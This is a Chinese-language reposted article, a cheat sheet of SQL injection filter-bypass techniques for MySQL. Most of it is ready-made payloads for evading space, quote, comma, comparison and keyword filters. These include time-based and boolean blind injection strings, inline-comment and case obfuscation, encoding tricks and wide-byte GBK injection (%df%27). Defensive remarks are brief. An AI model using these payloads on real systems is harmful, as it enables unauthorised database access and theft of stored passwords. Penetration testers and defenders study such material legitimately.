碼上歡樂
相關內容    簡體    繁體

SQL注入繞過技巧

本文轉載自   查看原文   2017-07-29 01:18   44275    SQL注入

1.繞過空格(注釋符/* */,%a0):

  兩個空格代替一個空格,用Tab代替空格,%a0=空格:

%20 %09 %0a %0b %0c %0d %a0 %00 /**/  /*!*/

  最基本的繞過方法,用注釋替換空格:

/*  注釋 */

使用浮點數:

select * from users where id=8E0union select 1,2,3
select * from users where id=8.0 select 1,2,3

2.括號繞過空格:

  如果空格被過濾,括號沒有被過濾,可以用括號繞過。

  在MySQL中,括號是用來包圍子查詢的。因此,任何可以計算出結果的語句,都可以用括號包圍起來。而括號的兩端,可以沒有多余的空格。

例如:

select(user())from dual where(1=1)and(2=2)

  這種過濾方法常常用於time based盲注,例如:

?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23

(from for屬於逗號繞過下面會有)

  上面的方法既沒有逗號也沒有空格。猜解database()第一個字符ascii碼是否為109,若是則加載延時。

3.引號繞過(使用十六進制):

  會使用到引號的地方一般是在最后的where子句中。如下面的一條sql語句,這條語句就是一個簡單的用來查選得到users表中所有字段的一條語句:

select column_name  from information_schema.tables where table_name="users"

  這個時候如果引號被過濾了,那么上面的where子句就無法使用了。那么遇到這樣的問題就要使用十六進制來處理這個問題了。
  users的十六進制的字符串是7573657273。那么最后的sql語句就變為了:

select column_name  from information_schema.tables where table_name=0x7573657273

4.逗號繞過(使用from或者offset):

  在使用盲注的時候,需要使用到substr(),mid(),limit。這些子句方法都需要使用到逗號。對於substr()和mid()這兩個方法可以使用from to的方式來解決:

select substr(database() from 1 for 1);
select mid(database() from 1 for 1);

  使用join:

 

union select 1,2     #等價於
union select * from (select 1)a join (select 2)b

 

  使用like:

select ascii(mid(user(),1,1))=80   #等價於
select user() like 'r%'

 

  對於limit可以使用offset來繞過:

select * from news limit 0,1
# 等價於下面這條SQL語句
select * from news limit 1 offset 0

5.比較符號(<>)繞過(過濾了<>:sqlmap盲注經常使用<>,使用between的腳本):

使用greatest()、least():(前者返回最大值,后者返回最小值)

 

  同樣是在使用盲注的時候,在使用二分查找的時候需要使用到比較操作符來進行查找。如果無法使用比較操作符,那么就需要使用到greatest來進行繞過了。
  最常見的一個盲注的sql語句:

select * from users where id=1 and ascii(substr(database(),0,1))>64

  此時如果比較操作符被過濾,上面的盲注語句則無法使用,那么就可以使用greatest來代替比較操作符了。greatest(n1,n2,n3,...)函數返回輸入參數(n1,n2,n3,...)的最大值。
  那么上面的這條sql語句可以使用greatest變為如下的子句:

select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

使用between and:

   between a and b:返回a,b之間的數據,不包含b。

6.or and xor not繞過:

and=&&  or=||   xor=|   not=!

7.繞過注釋符號(#,--(后面跟一個空格))過濾:

id=1' union select 1,2,3||'1

  最后的or '1閉合查詢語句的最后的單引號,或者:

id=1' union select 1,2,'3

8.=繞過:

  使用like 、rlike 、regexp 或者 使用< 或者 >

9.繞過union,select,where等:

(1)使用注釋符繞過:

  常用注釋符:

//,-- , /**/, #, --+, -- -, ;,%00,--a

  用法:

U/**/ NION /**/ SE/**/ LECT /**/user,pwd from user

(2)使用大小寫繞過:

id=-1'UnIoN/**/SeLeCT

(3)內聯注釋繞過:

id=-1'/*!UnIoN*/ SeLeCT 1,2,concat(/*!table_name*/) FrOM /*information_schema*/.tables /*!WHERE *//*!TaBlE_ScHeMa*/ like database()#

(4) 雙關鍵字繞過(若刪除掉第一個匹配的union就能繞過):

id=-1'UNIunionONSeLselectECT1,2,3–-

10.通用繞過(編碼):

  如URLEncode編碼,ASCII,HEX,unicode編碼繞過:

or 1=1即%6f%72%20%31%3d%31,而Test也可以為CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

11.等價函數繞過:

hex()、bin() ==> ascii()

sleep() ==>benchmark()

concat_ws()==>group_concat()

mid()、substr() ==> substring()

@@user ==> user()

@@datadir ==> datadir()

舉例:substring()和substr()無法使用時:?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74 

或者:
substr((select 'password'),1,1) = 0x70
strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1

12.寬字節注入:

  過濾 ' 的時候往往利用的思路是將 ' 轉換為 \' 。

  在 mysql 中使用 GBK 編碼的時候,會認為兩個字符為一個漢字,一般有兩種思路:

  (1)%df 吃掉 \ 具體的方法是 urlencode('\) = %5c%27,我們在 %5c%27 前面添加 %df ,形成 %df%5c%27 ,而 mysql 在 GBK 編碼方式的時候會將兩個字節當做一個漢字,%df%5c 就是一個漢字,%27 作為一個單獨的(')符號在外面:

id=-1%df%27union select 1,user(),3--+

  (2)將 \' 中的 \ 過濾掉,例如可以構造 %**%5c%5c%27 ,后面的 %5c 會被前面的 %5c 注釋掉。

一般產生寬字節注入的PHP函數:

   1.replace():過濾 ' \ ,將 ' 轉化為 \' ,將 \  轉為 \\,將 " 轉為 \" 。用思路一。

   2.addslaches():返回在預定義字符之前添加反斜杠(\)的字符串。預定義字符:' , " , \ 。用思路一

(防御此漏洞,要將 mysql_query 設置為 binary 的方式)

   3.mysql_real_escape_string():轉義下列字符:

\x00     \n     \r     \     '     "     \x1a

(防御,將mysql設置為gbk即可)

  


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 SQL注入繞過技巧 SQL注入繞過技巧 SQL注入繞過技巧 sql注入常見繞過技巧 SQL注入繞過的技巧總結 SQL注入之waf繞過 sql注入繞過方法 SQL注入繞過方法 SQL注入的優化和繞過 SQL注入繞過技術
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM